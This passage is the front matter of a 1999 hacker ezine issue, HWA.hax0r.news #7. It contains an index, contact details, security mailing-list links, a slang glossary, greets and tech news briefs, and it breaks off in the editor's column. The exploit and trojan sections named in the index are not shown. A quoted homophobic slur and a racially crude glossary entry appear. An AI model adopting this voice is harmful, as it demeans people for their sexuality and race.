💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › HWA › hwa-hn07.… captured on 2021-12-03 at 14:04:38.

View Raw

More Information

-=-=-=-=-=-=-

    [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
  ==========================================================================
  =                     <=-[ HWA.hax0r.news ]-=>                           =
  ==========================================================================
    [=HWA'99=]                         Number 7 Volume 1 1999 Feb 20th 99
  ==========================================================================


   "I got the teenage depression, thats all i'm talkin about, if you dunno
     what i mean then you better look out, look out!" 
                                      
                                            - Eddie & The Hotrods
     
   
   Synopsis
   --------     
   
   The purpose of this newsletter is to 'digest' current events of interest
   that affect the online underground and netizens in general. This includes
   coverage of general security issues, hacks, exploits, underground news
   and anything else I think is worthy of a look see.

    This list is NOT meant as a replacement for, nor to compete with, the
   likes of publications such as CuD or PHRACK or with news sites such as
   AntiOnline, the Hacker News Network (HNN) or mailing lists such as
   BUGTRAQ or ISN nor could any other 'digest' of this type do so.

    It *is* intended  however, to  compliment such material and provide a
   reference to those who follow the culture by keeping tabs on as many
   sources as possible and providing links to further info, its a labour
   of love and will be continued for as long as I feel like it, i'm not
   motivated by dollars or the illusion of fame, did you ever notice how
   the most famous/infamous hackers are the ones that get caught? there's
   a lot to be said for remaining just outside the circle... <g>


   @HWA
   
   =-----------------------------------------------------------------------= 
  
                     Welcome to HWA.hax0r.news ... #7 
                     
   =-----------------------------------------------------------------------=                      
                     
          "I dunno what i'm doing, but i'm damn good at it" 
                     
                                    - Seen on a button worn by ed..                  
    
    
    *******************************************************************    
    ***      /join #HWA.hax0r.news on EFnet the key is `zwen'       ***
    ***                                                             ***
    *** please join to discuss or impart news on techno/phac scene  ***
    *** stuff or just to hang out ... someone is usually around 24/7***
    *******************************************************************
                                             
                         
  =-------------------------------------------------------------------------= 
   
  Issue #7 little endian release, Feb 20th 1999        Don't be happy, worry.
  
  
  =--------------------------------------------------------------------------= 
  
  inet.d THIS b1lly the llammah 
  
  ________ ------- ___________________________________________________________
 |\____\_/[ INDEX ]__________________________________________________________/|         
 | |                                                                         ||
 | | Key     Content                                                         ||
  \|_________________________________________________________________________/    
  
   00.0  .. COPYRIGHTS 
   00.1  .. CONTACT INFORMATION & SNAIL MAIL DROP ETC
   00.2  .. SOURCES        
   00.3  .. THIS IS WHO WE ARE
   00.4  .. WHAT'S IN A NAME? why `HWA.hax0r.news'?
   00.5  .. THE HWA_FAQ V1.0 
    
   \__________________________________________________________________________/
    
   01.0  .. Greets
   01.1  .. Last minute stuff, rumours, newsbytes, mailbag
   02.0  .. From the editor
   03.0  .. Army Signal Command protecting networks from hackers   
   04.0  .. France plays leapfrog with US over crypto laws..     
   05.0  .. More kewl poetry from Phiregod
   06.0  .. ISP cracks User's machine then threatens legal action on THEM
   07.0  .. l0pht releases new NT admin exploit (and patch)
   07.1  .. Hackers Get Their Final Fantasy
   08.0  .. dcc yerself some r00t
   09.0  .. Cyrix bug crashes cpus
   10.0  .. Intel's id on a chip is more than it may seem
   11.0  .. Security Snake Oil (From CryptoGram)
   12.0  .. The Hacker Challenge (Reprint from HNN w/permission) by Qubik
   13.0  .. Trojans have come a long way, heres one in basic for some fun.
   
   AD.S  .. Post your site ads or etc here, if you can offer something in return
            thats tres cool, if not we'll consider ur ad anyways so send it in.
    
    H.W  .. Hacked Websites www.l0pht.com and www.hackernews.com hacked??   
    A.0  .. APPENDICES  
    A.1  .. PHACVW linx and references 
  ____________________________________________________________________________
 |\__________________________________________________________________________/|
 | |                                                                         ||
 | |                                                                         ||
 | |    The name Linus means "flaxen-haired" and is of Greek origin ...- Ed  ||
 | |                                                                         ||
 | |                                                                         ||
 | |     "Shouting the loudest does not make you right or true" - FP         ||  
 | |                                                                         ||
  \|_________________________________________________________________________|/
       

     @HWA'99                 
     
     
  
         
  00.0  (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
     OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
     WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
     (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
     READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
     
     Important semi-legalese and license to redistribute:
     
     YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF 
     AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
     ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED 
     IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE 
     APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
     IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
     ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
     ME PRIVATELY current email cruciphux@dok.org 
     
     THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
     WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
     THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
     
     I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
     AND REDISTRIBUTE/MIRROR. - EoD
   
    
     Although this file and all future issues are now copyright, some of
    the content holds its  own copyright and these are printed and 
    respected. News is news so i'll print any and all news but will quote 
    sources when the source is known, if its good enough for CNN its good
    enough for me. And i'm doing it for free on my own time so pfffft. :) 
    
    No monies are made or sought through the distribution of this material.
    If you have a problem or concern email me and we'll discuss it.
    
    cruciphux@dok.org
    
    Cruciphux [C*:.]

      
     
  00.1  CONTACT INFORMATION AND MAIL DROP
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       Has it occurred to anybody that "AOL for Dummies" is an extremely
       redundant name for a book? 
                                      - unknown
       
           
     Wahoo, we now have a mail-drop, if you are outside of the U.S.A or 
    Canada / North America (hell even if you are inside ..) and wish to
    send printed matter like newspaper clippings a subscription to your
    cool foreign hacking zine or photos, small non-explosive packages
    or sensitive information etc etc well, now you can. (w00t) please
    no more inflatable sheep or plastic dog droppings, or fake vomit
    thanks.
    
    Send all goodies to:
    
	    HWA NEWS
	    P.O BOX 44118
	    370 MAIN ST. NORTH
	    BRAMPTON, ONTARIO
	    CANADA
	    L6V 4H5
	    
    Ideas for interesting 'stuff' to send in apart from news:
    
    - Photo copies of old system manual front pages (optionally signed by you) ;-)
    - Photos of yourself, your mom, sister, dog and or cat in a NON
      compromising position plz I don't want pr0n. <g>
    - Picture postcards
    - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
      tapes with hack/security related archives, logs, irc logs etc on em.
    - audio or video cassettes of yourself/others etc of interesting phone
      fun or social engineering examples or transcripts thereof.
    
    If you still can't think of anything you're probably not that interesting
    a person after all so don't worry about it <BeG>  
    
    Our current email:
    
    Submissions/zine gossip.....: hwa@press.usmc.net
    Private email to editor.....: cruciphux@dok.org
    Distribution/Website........: sas72@usa.net

    @HWA

           
    
  00.2  Sources ***
        ~~~~~~~~~~~     

     Sources can be some, all, or none of the following (by no means complete
    nor listed in any degree of importance) Unless otherwise noted, like msgs
    from lists or news from other sites, articles and information is compiled
    and or sourced by Cruciphux no copyright claimed.

    HiR:Hackers Information Report... http://axon.jccc.net/hir/
    News & I/O zine ................. http://www.antionline.com/
   *News/Hacker site................. http://www.bikkel.com/~demoniz/ *DOWN!*
    News (New site unconfirmed).......http://cnewz98.hypermart.net/
    Back Orifice/cDc..................http://www.cultdeadcow.com/
    News site (HNN) .....,............http://www.hackernews.com/
    Help Net Security.................http://net-security.org/  
    News,Advisories,++ ...............http://www.l0pht.com/
    NewsTrolls (HNN)..................http://www.newstrolls.com/
    News + Exploit archive ...........http://www.rootshell.com/beta/news.html
    CuD ..............................http://www.soci.niu.edu/~cudigest
    News site+........................http://www.zdnet.com/

    +Various mailing lists and some newsgroups, such as ...
    +other sites available on the HNN affiliates page, please see
     http://www.hackernews.com/affiliates.html as they seem to be popping up
     rather frequently ...

    * Yes demoniz is now officially retired, if you go to that site though the
     Bikkel web board (as of this writing) is STILL ACTIVE, www.hwa-iwa.org will
     also be hosting a webboard as soon as that site comes online perhaps you can
     visit it and check us out if I can get some decent wwwboard code running I
     don't really want to write my own, another alternative being considered is a
     telnet bbs that will be semi-open to all, you will be kept posted. - cruciphux
    
    http://www.the-project.org/ .. IRC list/admin archives
    http://www.anchordesk.com/  .. Jesse Berst's AnchorDesk
    
    alt.hackers.malicious
    alt.hackers
    alt.2600
    BUGTRAQ
    ISN security mailing list
    ntbugtraq
    <+others>

    NEWS Agencies, News search engines etc:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    http://www.cnn.com/SEARCH/
    http://www.foxnews.com/search/cgi-bin/search.cgi?query=cracker&days=0&wires=0&startwire=0
    http://www.news.com/Searching/Results/1,18,1,00.html?querystr=cracker
    http://www.ottawacitizen.com/business/
    http://search.yahoo.com.sg/search/news_sg?p=cracker
    http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=cracker
    http://www.zdnet.com/zdtv/cybercrime/
    http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)

    NOTE: See appendices for details on other links.
    
    Referenced news links
    ~~~~~~~~~~~~~~~~~~~~~
       
    http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
    http://freespeech.org/eua/ Electronic Underground Affiliation
    http://www.l0pht.com/cyberul.html     
    http://www.hackernews.com/archive.html?122998.html
    http://ech0.cjb.net ech0 Security
    http://net-security.org Net Security  

    ...
    
    
    Submissions/Hints/Tips/Etc
    ~~~~~~~~~~~~~~~~~~~~~~~~~~
    
             "silly faggot, dix are for chix" 
             
                                     - from irc ... by unknown ;-)
    
    
    All submissions that are `published' are printed with the credits
    you provide, if no response is received by a week or two it is assumed
    that you don't care wether the article/email is to be used in an issue
    or not and may be used at my discretion.
    
    Looking for:
    
    Good news sites that are not already listed here OR on the HNN affiliates
    page at http://www.hackernews.com/affiliates.html
    
    Magazines (complete or just the articles) of breaking sekurity or hacker
    activity in your region, this includes telephone phraud and any other
    technological use, abuse hole or cool thingy. ;-) cut em out and send it
    to the drop box.
    
    
    - Ed
    
    Mailing List Subscription Info   (Far from complete)         Feb 1999
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   ~~~~~~~~~~~~~~~~~~~         ~~~~~~~~	
        
    ISS Security mailing list faq : http://www.iss.net/iss/maillist.html
    
    
    THE MOST READ:
    
    BUGTRAQ - Subscription info
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    What is Bugtraq?     

    Bugtraq is a full-disclosure UNIX security mailing list, (see the info
    file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to 
    bugtraq, send mail to listserv@netspace.org containing the message body
    subscribe bugtraq. I've been archiving this list on the web since late 
    1993. It is searchable with glimpse and archived on-the-fly with hypermail.
    
    Searchable Hypermail Index;
         
          http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html
    
    
        
    About the Bugtraq mailing list
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    The following comes from Bugtraq's info file: 

    This list is for *detailed* discussion of UNIX security holes: what they are,
    how to exploit, and what to do to fix them. 

    This list is not intended to be about cracking systems or exploiting their 
    vulnerabilities. It is about defining, recognizing, and preventing use of 
    security holes and risks. 

    Please refrain from posting one-line messages or messages that do not contain
    any substance that can relate to this list`s charter. 

    I will allow certain informational posts regarding updates to security tools,
    documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
    on this list. 

    Please follow the below guidelines on what kind of information should be posted
    to the Bugtraq list: 

    + Information on Unix related security holes/backdoors (past and present) 
    + Exploit programs, scripts or detailed processes about the above 
    + Patches, workarounds, fixes 
    + Announcements, advisories or warnings 
    + Ideas, future plans or current works dealing with Unix security 
    + Information material regarding vendor contacts and procedures 
    + Individual experiences in dealing with above vendors or security organizations 
    + Incident advisories or informational reporting 

    Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq
    reflector address if the response does not meet the above criteria. 

    Remember: YOYOW. 

    You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of
    those words without your permission in any medium outside the distribution of this list may be challenged by you, the author. 

    For questions or comments, please mail me: 
    chasin@crimelab.com (Scott Chasin) 

    
    BEST-OF-SECURITY Subscription Info.
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
           
    
                    _/_/_/          _/_/          _/_/_/
                   _/    _/      _/    _/      _/
                  _/_/_/        _/    _/        _/_/
                 _/    _/      _/    _/            _/
                _/_/_/          _/_/        _/_/_/

                Best            Of          Security

    "echo subscribe|mail best-of-security-request@suburbia.net"

                                or

    "echo subscribe|mail best-of-security-request-d@suburbia.net"

                          (weekly digest)

    For those of you that just don't get the above, try sending a message to
    best-of-security-request@suburbia.net with a subject and body of subscribe
    and you will get added to the list (maybe, if the admin likes your email).  
    
    Crypto-Gram
    ~~~~~~~~~~~
    
       CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
      insights, and commentaries on cryptography and computer security.

      To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
      blank message to crypto-gram-subscribe@chaparraltree.com.� To unsubscribe,
      visit http://www.counterpane.com/unsubform.html.� Back issues are available
      on http://www.counterpane.com.
      
       CRYPTO-GRAM is written by Bruce Schneier.� Schneier is president of
      Counterpane Systems, the author of "Applied Cryptography," and an inventor
      of the Blowfish, Twofish, and Yarrow algorithms.� He served on the board of
      the International Association for Cryptologic Research, EPIC, and VTW.� He
      is a frequent writer and lecturer on cryptography.
  

    CUD Computer Underground Digest
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    This info directly from their latest ish:
    
    Computer underground Digest��� Sun� 14 Feb, 1999�� Volume 11 : Issue 09
�����
��������������������� ISSN� 1004-042X

������ Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
������ News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
������ Archivist: Brendan Kehoe
������ Poof Reader:�� Etaion Shrdlu, Jr.
������ Shadow-Archivists: Dan Carosone / Paul Southworth
������������������������� Ralph Sims / Jyrki Kuoppala
������������������������� Ian Dickinson
������ Cu Digest Homepage: http://www.soci.niu.edu/~cudigest

    

    [ISN] Security list
    ~~~~~~~~~~~~~~~~~~~
    This is a low volume list with lots of informative articles, if I had my
    way i'd reproduce them ALL here, well almost all .... ;-) - Ed
    
    
    Subscribe: mail majordomo@repsec.com with "subscribe isn".



    @HWA
    
     
  00.3  THIS IS WHO WE ARE 
        ~~~~~~~~~~~~~~~~~~
      
      'A "thug" was once the name for a ritual strangler, and is taken from
       the Hindu word Thag... ' - Ed
      
      
      Some HWA members and Legacy staff
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~    
      cruciphux@dok.org.........: currently active/editorial
      darkshadez@ThePentagon.com: currently active/man in black
      fprophet@dok.org..........: currently active/IRC+ man in black
      sas72@usa.net ............. currently active/IRC+ distribution
      vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
      dicentra...(email withheld): IRC+ grrl in black
      
      
      Foreign Correspondants/affiliate members
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      ATTENTION: All foreign correspondants please check in or be removed by next
      issue  I need  your current emails since contact info was recently lost in a 
      HD mishap and i'm not carrying any deadweight. Plus we need more people sending
      in info, my apologies for not getting back to you if you sent in January I lost
      it, please resend. 
      
      
               
       N0Portz ..........................: Australia      
       Qubik ............................: United Kingdom 
       system error .....................: Indonesia      
       Wile (wile coyote) ...............: Japan/the East 
       Ruffneck  ........................: Netherlands/Holland
       
       And unofficially yet contributing too much to ignore ;)
       
       Spikeman .........................: World media 
       
       Please send in your sites for inclusion here if you haven't already
       also if you want your emails listed send me a note ... - Ed
       
      http://www.genocide2600.com/~spikeman/  .. Spikeman's DoS and protection site
        
       
     Contributors to this issue:
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~
       liquid phire......................: underground prose
     
       Qubik ............................: Hacking in Germany+     
     
       Spikeman .........................: daily news updates+       
     
       *******************************************************************    
       ***      /join #HWA.hax0r.news on EFnet the key is `zwen'       ***
       *******************************************************************
    
    :-p  
    
    
    1. We do NOT work for the government in any shape or form.Unless you count paying
       taxes ... in which case we work for the gov't in a BIG WAY. :-/
     
    2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
       events its a good idea to check out issue #1 at least and possibly also the
       Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...
        
    
    @HWA
    
    

  00.4  Whats in a name? why HWA.hax0r.news??
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
      Well what does HWA stand for? never mind if you ever find out I may
     have to get those hax0rs from 'Hackers' or the Pretorians after you.
     
     In case you couldn't figure it out hax0r is "new skewl" and although
     it is laughed at, shunned, or even pidgeon holed with those 'dumb
     leet (l33t?) dewds' <see article in issue #4> this is the state
     of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you 
     up  and comers, i'd highly recommend you get that book. Its almost 
     like  buying a clue. Anyway..on with the show .. - Editorial staff
     

   

  00.5  HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
    Also released in issue #3. (revised) check that issue for the faq
    it won't be reprinted unless changed in a big way with the exception
    of the following excerpt from the FAQ, included to assist first time
    readers:

    Some of the stuff related to personal useage and use in this zine are
    listed below: Some are very useful, others attempt to deny the any possible
    attempts at eschewing obfuscation by obsucuring their actual definitions.
    
    @HWA   - see EoA  ;-)
    
    !=     - Mathematical notation "is not equal to" or "does not equal"
             ASC(247)  "wavey equals" sign means "almost equal" to. If written
             an =/= (equals sign with a slash thru it) also means !=, =< is Equal
             to or less than and =>  is equal to or greater than (etc, this aint 
             fucking grade school, cripes, don't believe I just typed all that..)      
             
    AAM    - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)
    
    AOL    - A great deal of people that got ripped off for net access by a huge
             clueless isp with sekurity that you can drive buses through, we're
             not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
             least they could try leasing one??
             
   *CC     - 1 - Credit Card (as in phraud)
             2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's
    
    CCC    - Chaos Computer Club (Germany)               
    
   *CON    - Conference, a place hackers crackers and hax0rs among others go to swap
             ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
             watch videos and seminars, get drunk, listen to speakers, and last but
             not least, get drunk.
   *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
                 speak he's the guy that breaks into systems and is often (but by no
                 means always) a "script kiddie" see pheer
              2 . An edible biscuit usually crappy tasting without a nice dip, I like
                  jalapeno pepper dip or chives sour cream and onion, yum - Ed
    
    Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
              Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
              ebonics, speaking in a dark tongue ... being ereet, see pheer
                              
    EoC    - End of Commentary
    
    EoA    - End of Article or more commonly @HWA
    
    EoF    - End of file
    
    EoD    - End of diatribe (AOL'ers: look it up)
    
    FUD    - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
            usually in general media articles not high brow articles such as ours or other
            HNN affiliates ;)
            
    du0d   - a small furry animal that scurries over keyboards causing people to type
             wierd crap on irc, hence when someone says something stupid or off topic
             'du0d wtf are you talkin about' may be used.        
            
   *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R
            
   *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
            define, I think it is best defined as pop culture's view on The Hacker ala
            movies such as well erhm "Hackers" and The Net etc... usually used by "real"
            hackers or crackers in a derogatory or slang humorous way, like 'hax0r me 
            some coffee?' or can you hax0r some bread on the way to the table please?'          
            
            2 - A tool for cutting sheet metal.
            
    HHN    - Maybe a bit confusing with HNN but we did spring to life around the same
             time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
             noun means the hackernews site proper. k? k. ;&
             
    HNN    - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html       
    
    J00    - "you"(as in j00 are OWN3D du0d) - see 0wn3d 
    
    MFI/MOI- Missing on/from IRC
    
    NFC   - Depends on context: No Further Comment or No Fucking Comment
    
    NFR   - Network Flight Recorder (Do a websearch) see 0wn3d
    
    NFW   - No fuckin'way 
    
   *0WN3D - You are cracked and owned by an elite entity see pheer 
   *OFCS  - Oh for christ's sakes
       
    PHACV - And variations of same <coff> 
            Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare
          
          Alternates: H - hacking, hacktivist
                      C - Cracking <software>
                      C - Cracking <systems hacking>
                      V - Virus 
                      W - Warfare <cyberwarfare usually as in Jihad>
                     CT - Cyber Terrorism
   
   *PHEER -  This is what you do when an ereet or elite person is in your presence
            see 0wn3d 
                       
   *RTFM  - Read the fucking manual - not always applicable since some manuals are
            pure shit but if the answer you seek is indeed in the manual then you
            should have RTFM you dumb ass.
    
    TBC   - To Be Continued also 2bc (usually followed by ellipses...) :^0
    
    TBA   - To Be Arranged/To Be Announced also 2ba
    
    TFS   - Tough fucking shit.
    
   *w00t  - 1 - Reserved for the uber ereet, noone can say this without severe repercussions
            from the underground masses. also "w00ten" <sic>
            
            2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)
            
    *wtf  - what the fuck       
    
    *ZEN  - The state you reach when you *think* you know everything (but really don't)
            usually shortly after reaching the ZEN like state something will break that
            you just 'fixed' or tweaked.
        
  01.0  Greets!?!?! yeah greets! w0w huh. - Ed
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     Thanks to all in the community for their support and interest but i'd
     like to see more reader input, help me out here, whats good, what sucks
     etc, not that I guarantee i'll take any notice mind you, but send in 
     your thoughts anyway.
     
     
     Shouts to:

       * Kevin Mitnick       * demoniz          * The l0pht crew
       * tattooman           * Dicentra         * Pyra          
       * Vexxation           * FProphet         * TwistedP      
       * NeMstah             * the readers      * mj
       * Kokey               * ypwitch          * kimmie
       * k-os                * gphoe            * YOU.
       
       * #leetchans ppl, you know who you are...
         
     
       * all the people who sent in cool emails and support
       * our new 'staff' members.
     
  
     kewl sites:
     
     + http://www.freshmeat.net/
     + http://www.slashdot.org/
     + http://www.l0pht.com/
     + http://www.2600.com/
     + http://hacknews.bikkel.com/ (http://www.bikkel.com/~demoniz/)
     + http://www.legions.org/
     + http://www.genocide2600.com/      
     + http://www.genocide2600.com/~spikeman/
     + http://www.genocide2600.com/~tattooman/     
     + http://www.hackernews.com/ (Went online same time we started issue 1!)          
   
     @HWA
     

  01.1  Last minute stuff, rumours and newsbytes
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       "What is popular isn't always right, and what is right isn't
         always popular..." 
                           - FProphet '99

    +++ When was the last time you backed up your important data?    
        
     ++ AT&T-TCI merger faces deadline
        Contributed by sAs72 source: ZDNet

        The fate of AT&T's multibillion-dollar merger with TCI will soon
        be decided. City commissions in Seattle and other municipalities
        have put up a good fight over cable open access, but must vote
        today on whether to approve or deny the deal, along with the
        transfer of cable licenses in their areas.
        http://www.news.com/News/Item/0%2C4%2C32441%2C00.html?dd.ne.txt.0216.02

    ++  Intel drives low-cost cable modems

        High-speed cable modems may become cheaper in the near future
        as a result of an Intel initiative now coming to light.� Intel is
        working with Libit Signal Processing and possibly other partners
        to produce a futuristic breed of devices called "host-based" cable
        modems.� News.com explains how these devices work.
        http://www.news.com/News/Item/0%2C4%2C32406%2C00.html?dd.ne.txt.0216.03

    ++  Boycott pressure in full force

        Critics of Intel's new chip technology are trying to widen a boycott
        and enlist the government to take a stand against the Pentium III
        processor which the critics say can trace where users have been
        on the Internet.� Will they succeed before the February 26 release date?
        http://www.news.com/News/Item/0%2C4%2C32410%2C00.html?dd.ne.txt.0216.04

����++� ABOUT THOSE FREE IMACS ... (BUS. 10:00 am)
        http://www.wired.com/news/news/email/explode-infobeat/business/story/17961.html

     �� Before you sign up for the iMac giveaway that One Stop
  ����� Communications is hawking, you might want to check out the
������� company founder's checkered history. By Craig Bicknell.
���������� . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

����++�� BIG BLUE DOES DIGITAL BROADCAST (TECH. 9:30 am)
         http://www.wired.com/news/news/email/explode-infobeat/technology/story/17960.html

�������� The computer giant said it will team up with five companies
�������� to secure digitally broadcast content... Also: Owners of the
�������� mighty Rio MP3 player can now dress up the device.
���������� . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

����++ AT&T OWNERS BACK TCI DEAL (BUS. 7:40 am)
       http://www.wired.com/news/news/email/explode-infobeat/business/story/17954.html

�������The merger of the phone giant and the cable company easily
�������clears another barrier.
�

����++�BELLSOUTH, 3COM GET SPEEDY (TECH. 7:40 am)
       http://www.wired.com/news/news/email/explode-infobeat/technology/story/17956.html

�������The phone company wants to make digital subscriber lines
�������accessible in the South, so it'll offer 3Com modems and
�������joint sales, online and off.
���������

 ���++�CHIPS AHOY (TECH. 3:00 am)
       http://www.wired.com/news/news/email/explode-infobeat/technology/story/17952.html

�������Sony unveils its new PlayStation super-chip and wows an
�������annual gathering of leading processor designers. Leander
�������Kahney reports from San Francisco.
���������


����++�THE MOST WIRED NATION ON EARTH (BUS. 3:00 am)
       http://www.wired.com/news/news/email/explode-infobeat/business/story/17948.html

�������Canada's finance minister announces a four-year C$1.8 billion
�������spending plan to connect every corner of the
�������northern nation.
���������
����++�EFF APPOINTS NEW DIRECTOR (POL. Tuesday)
       http://www.wired.com/news/news/email/explode-infobeat/politics/story/17941.html

�������With one foot in Silicon Valley and one on Capitol Hill, Tara
�������Lemmey will lead the Electronic Frontier Foundation into the
�������next millennium. Observers are beaming. By James Glave.
�������
����++�� CRISPER, CHEAPER PIX OF EARTH (TECH. Tuesday)
       http://www.wired.com/news/news/email/explode-infobeat/technology/story/17936.html
������ The burgeoning market for satellite images of the world is
������ driving the need for affordable software to process them.
������ Enter a new open-source project that does just that. By
� ���� Chris Oakes.
���������� 

����++�� UPSCALE ONLINE AUCTIONING (BUS. Tuesday)
         http://www.wired.com/news/news/email/explode-infobeat/business/story/17940.html
�������� Sotheby's ups the ante of online auctioning. The exclusive
�������� auction house has signed over 1,000 art dealers to sell
�������� merchandise on its new site.
��������� 

����++�� COMPAQ BUYS ZIP2 (BUS. Tuesday)
         http://www.wired.com/news/news/email/explode-infobeat/business/story/17939.html
�������� The PC maker buys the online-publishing software vendor to
�������� beef up AltaVista. Also: Drugstore.com lands on AOL,
�������� Excite.... ETrade to sell own mutual funds.... And more.

     ++ Snarfed by sAs- contributed by erehwon (HNN)
        Feb 19th'99
        The National Police Agency of Japan has said that high-tech
        crime has risen 58% in the country over the last year. They said
        there where 415 cases categorized as high-tech crimes in 1998,
        compared to 262 in 1997. Computer-related fraud included forging
        bank account data and reprogramming electromagnetic data. 

        Detriot News ............http://deseretnews.com/dn/view/0,1249,30011968,00.html?
        San Jose Mecury News.....http://www.sjmercury.com/breaking/docs/015380.html
        Nando Times..............http://www.techserver.com/story/body/0,1634,19705-32364-235694-0,00.html


     ++  Scanners illegal 
         Contributed by sw3 Source: Innerpulse News Network at csoft.net
         Wednesday - February 10, 1999. 05:05PM UTC 
         Reported today on HNN; the Wireless Privacy Enhacement Act of 1999
         has been entered into the US House of Representatives by Rep. Heather
         Wilson. That would make illegal devices that can receive or decode personal
         radio communication such as police bands, cellular phones, pagers; such as
         scanners. (luckily us ham types and tech types know so many ways around this
         it doesn't matter to us but it sure sucks for the poor mr and mrs average
         scanner owner - Ed)

         Rep. Wilson's website: http://www.house.gov/wilson/welcome.html
         ask.heather@mail.house.gov 
         
     ++  Federal budget buys some space
	 Contributed by sAs- source: EXN science wire
	
	��ttp://exn.ca/html/templates/mastertop.cfm?ID=19990217-53
	
	Packed with funding goodies -- the 1999 federal budget has left the
	employees of the Canadian Space Agency starry-eyed.� "The mood is 
	great here," confirmed jubilant CSA spokesman Hugues Gilbert in a 
	telephone interview Wednesday.�� And why wouldn't it be?� The budget
	announced by Finance Minister Paul Martin's this week gives the space
	agency an extra $430 million over the next three years, plus� $300 mil
	annually after that.���� 
	    
�����++ Hands-off and intelligent
	Contributed by sAs- source: EXN science wire
	http://exn.ca/html/templates/mastertop.cfm?ID=19990217-55
	
	The day when your average car driver can relax, put his hands behind
	his head and watch all the pretty trees go by is not quite upon us yet.
	But researchers in Germany won't rest until it is. They're busy developing
	an autonomous intelligent copilot system that should ultimately be able to
	get you from point A to B with almost no input on your part. You still might
	have to take charge of the sound system, though. - this should be fun when 
	it comes out, <beep> WARNING! your vehicle has just been hijacked! - Ed
	
     
     Mucho thanks to Spikeman for directing his efforts to our cause of bringing
     you the news we want to read about in a timely manner ... - Ed
     
     @HWA
     
     
  02.0  From the editor.
        ~~~~~~~~~~~~~~~~

     #include <stdio.h>
     #include <insight.h>
     #include <backup.h>

     main()
     {
      printf ("Read commented source!\n\n");
      
     /*             
      *Ok kiddies we're pumping out some more stuff here as we steamroll into  
